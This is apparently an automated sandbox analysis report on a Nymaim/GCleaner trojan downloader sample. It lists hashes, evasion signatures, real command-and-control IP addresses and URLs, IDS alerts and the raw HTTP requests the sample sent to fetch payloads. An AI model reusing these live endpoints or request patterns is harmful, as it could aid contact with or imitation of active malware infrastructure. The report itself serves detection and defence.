Windows Analysis Report
1ibwQtrqNy.exe

Overview

General Information

Sample Name: 1ibwQtrqNy.exe
Original Sample Name: 65dd3ed482f22906e70dd004a73e5cef.exe
Analysis ID: 877011
MD5: 65dd3ed482f22906e70dd004a73e5cef
SHA1: ffe8496a9d3f0a2f5571e683b466d3f3d2092172
SHA256: 15f5d9cd2cb95efaecbf0bc1a455cd6cc301848a5ba71cc4788e4b68c327382d
Tags: 32exetrojan
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Name Description Attribution Blogpost URLs Link
Nymaim Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

AV Detection
barindex
Found malware configuration
Source: 2.2.Rec528.exe.400000.1.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}
Multi AV Scanner detection for submitted file
Source: 1ibwQtrqNy.exe Virustotal: Detection: 19% Perma Link
Antivirus detection for URL or domain
Source: http://45.12.253.75/dll.phpi Avira URL Cloud: Label: malware
Source: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixintej Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.phph Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.phpd Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.php% Avira URL Cloud: Label: malware
Source: http://45.12.253.72/del.php Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.phpQ Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.phpP Avira URL Cloud: Label: malware
Source: http://45.12.253.72/default/stuk.phpi Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.phpX Avira URL Cloud: Label: malware
Source: http://45.12.253.72/default/stuk.phpt Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.phpL Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.phps Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.php4 Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.php0 Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.php9 Avira URL Cloud: Label: malware
Source: http://45.12.253.75/dll.php8 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Avira: detection malicious, Label: HEUR/AGEN.1314978
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe ReversingLabs: Detection: 61%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 2_2_00403770

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Unpacked PE file: 2.2.Rec528.exe.400000.1.unpack
Uses 32bit PE files
Source: 1ibwQtrqNy.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045157C FindFirstFileA,GetLastError, 1_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0048AC5C FindFirstFileA,6C8D69D0,FindNextFileA,FindClose, 1_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEB0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,LdrInitializeThunk,__Init_thread_footer,LdrInitializeThunk,LdrInitializeThunk,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00423DAD LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW, 2_2_00423DAD
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10007E39 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW, 2_2_10007E39
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044034 ET TROJAN Potential GCleaner CnC Checkin 192.168.2.3:49697 -> 45.12.253.56:80
Source: Traffic Snort IDS: 2044031 ET TROJAN GCleaner CnC Checkin M1 192.168.2.3:49698 -> 45.12.253.72:80
Source: Traffic Snort IDS: 2044032 ET TROJAN GCleaner Payload Retrieval Attempt 192.168.2.3:49698 -> 45.12.253.72:80
Source: Traffic Snort IDS: 2044037 ET TROJAN GCleaner Downloader - Payload Response 45.12.253.72:80 -> 192.168.2.3:49698
Source: Traffic Snort IDS: 2044033 ET TROJAN GCleaner CnC Checkin M2 192.168.2.3:49699 -> 45.12.253.75:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 45.12.253.56
Source: Malware configuration extractor IPs: 45.12.253.72
Source: Malware configuration extractor IPs: 45.12.253.98
Source: Malware configuration extractor IPs: 45.12.253.75
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.12.253.72 45.12.253.72
Source: Joe Sandbox View IP Address: 45.12.253.72 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: Rec528.exe, 00000002.00000002.443117659.000000000165A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte
Source: Rec528.exe, 00000002.00000002.443117659.000000000165A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixintej
Source: Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/default/puk.php
Source: Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/default/stuk.php
Source: Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/default/stuk.phpi
Source: Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/default/stuk.phpt
Source: Rec528.exe, 00000002.00000003.373976623.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.380624834.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.422045948.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.395381822.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430360645.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.367385976.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/del.php
Source: Rec528.exe, 00000002.00000003.430338328.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.php
Source: Rec528.exe, 00000002.00000003.422045948.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.php%
Source: Rec528.exe, 00000002.00000003.395381822.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.php0
Source: Rec528.exe, 00000002.00000003.395381822.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.380624834.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.php4
Source: Rec528.exe, 00000002.00000002.443117659.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.373976623.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.380624834.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.422045948.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.395381822.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.367385976.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.php8
Source: Rec528.exe, 00000002.00000003.373976623.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.php9
Source: Rec528.exe, 00000002.00000003.380624834.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.422045948.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.395381822.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpH
Source: Rec528.exe, 00000002.00000003.395381822.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpL
Source: Rec528.exe, 00000002.00000003.422045948.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpP
Source: Rec528.exe, 00000002.00000003.415189342.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpQ
Source: Rec528.exe, 00000002.00000003.380624834.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.422045948.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.395381822.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpX
Source: Rec528.exe, 00000002.00000003.367385976.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.373976623.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpd
Source: Rec528.exe, 00000002.00000003.388832564.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phph
Source: Rec528.exe, 00000002.00000003.422045948.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpi
Source: Rec528.exe, 00000002.00000003.373976623.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.380624834.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.422045948.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.395381822.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpp
Source: Rec528.exe, 00000002.00000003.422045948.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.395381822.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phps
Source: Rec528.exe, 00000002.00000003.373976623.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.422045948.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.380624834.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.395381822.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.422045948.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.380624834.0000000001723000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.phpx
Source: is-0I9HC.tmp.1.dr String found in binary or memory: http://www.finalrecovery.com/buy.htm
Source: is-EJ9G4.tmp.1.dr String found in binary or memory: http://www.imagemagick.org
Source: 1ibwQtrqNy.exe String found in binary or memory: http://www.innosetup.com
Source: is-2H2P0.tmp, is-2H2P0.tmp, 00000001.00000002.444700726.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-2H2P0.tmp.0.dr, is-U3J98.tmp.1.dr String found in binary or memory: http://www.innosetup.com/
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp, is-2H2P0.tmp, 00000001.00000000.351821763.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-2H2P0.tmp.0.dr, is-U3J98.tmp.1.dr String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp, is-2H2P0.tmp, is-2H2P0.tmp, 00000001.00000002.444700726.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-2H2P0.tmp.0.dr, is-U3J98.tmp.1.dr String found in binary or memory: http://www.remobjects.com/?ps
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp, is-2H2P0.tmp, 00000001.00000002.444700726.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-2H2P0.tmp.0.dr, is-U3J98.tmp.1.dr String found in binary or memory: http://www.remobjects.com/?psU
Source: is-2H2P0.tmp, 00000001.00000002.445963159.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, Rec528.exe, 00000002.00000000.355680126.0000000001271000.00000002.00000001.01000000.00000007.sdmp, Rec528.exe.1.dr, is-EJ9G4.tmp.1.dr String found in binary or memory: https://macrorit.com/disk-wiper-commercial-license-upgrade.html
Source: is-2H2P0.tmp, 00000001.00000002.445963159.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, Rec528.exe, 00000002.00000000.355680126.0000000001271000.00000002.00000001.01000000.00000007.sdmp, Rec528.exe.1.dr, is-EJ9G4.tmp.1.dr String found in binary or memory: https://macrorit.com/free-software.html
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B40
Source: global traffic HTTP traffic detected: GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.56Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /default/stuk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /default/puk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
